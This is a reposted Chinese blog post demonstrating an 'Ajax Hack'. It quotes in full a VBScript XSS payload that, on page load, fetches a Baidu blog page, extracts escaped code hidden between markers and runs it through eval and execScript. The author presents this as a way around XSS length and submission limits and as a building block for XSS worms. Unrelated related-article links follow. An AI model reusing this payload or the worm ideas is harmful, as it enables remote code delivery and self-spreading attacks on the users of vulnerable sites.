博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
一个有趣的Ajax Hack示范
阅读量:7116 次
发布时间:2019-06-28

本文共 1160 字,大约阅读时间需要 3 分钟。

今天在梦之光芒的BLOG上看见了一个Ajax Hack示范,其实跨站发现很容易,但是要做到大危害还是很难,偷偷COOKIE什么的只针对用户而已,XSS WORM的那种利用才是可怕的。 

来看看他的一段VBSCRIPT脚本 

vbscript:execute("  dim l,s:  l=chr(13)+chr(10):  s=""sub mycode""&l:  s=s&""dim http,url,pg,p,p2,cd,ht,o""&l:  s=s&""url=""""http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html""""""&l:  s=s&""set http=createobject(""""Microsoft.XMLHTTP"""")""&l:  s=s&""http.open """"get"""",url,false""&l:  s=s&""http.send("""""""")""&l:  s=s&""pg=http.responseText""&l:  s=s&""p=instr(1,pg,""""ILOVEUNING-BEGIN"""")""&l:  s=s&""if p=null or p<1 then exit sub""&l:  s=s&""p=instr(p,pg,chr(37))""&l:  s=s&""if p=null or p<1 then exit sub""&l:  s=s&""p2=instr(p,pg,chr(60))""&l:  s=s&""cd=mid(pg,p,p2-p)""&l:  s=s&""ht=""""eval(unescape('""""&cd&""""'))""""""&l:  s=s&""window.execScript ht,""""jscript""""""&l:  s=s&""end sub""&l:  execute(s):  document.body.onload=getref(""mycode""):  ")

调用代码在 http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html 

这样就实现了本站调用代码,换个思路,是否这就解决了Ajax Hack常用的的提交数据限制(站外提交没有权限,XSS代码长度限制)的问题,呵呵~这里我也没实验。 
再还有一个思路就是剑心的分片写入脚本再eval出来~这两个思路结合起来,也许我们就能在苛刻的XSS漏洞上创造奇迹!

转载于:https://www.cnblogs.com/ranran/p/3709575.html

你可能感兴趣的文章
使用AT指令给飞信号发短信=失败=[已经成功]
查看>>
Information Storage Management 认证题库题解系列 题21
查看>>
ExtJs3.3升级4.2
查看>>
列表上下滚动效果JS示例
查看>>
如何设计一门语言(一)——什么是坑(a)
查看>>
输入样例NYOJ 514 数字 1的个数
查看>>
博客属性10个非常不错的CSS技巧
查看>>
Windows 剪贴板的预定义格式
查看>>
linux修改文件权限和用户组管理小结
查看>>
将NavigationBar设置透明
查看>>
加域(Netdom)
查看>>
VB--"." 和 "!" ?
查看>>
Go Revel - Results(响应)
查看>>
关于ActiveMQ的配置
查看>>
c# WinForm 边框阴影窗体
查看>>
组策略--受限制的组
查看>>
SQL Server数据库快照的工作方式
查看>>
解决Android版Firefox字体显示过大的问题
查看>>
[Command] alias - 别名
查看>>
Fedora 10编程开发工具
查看>>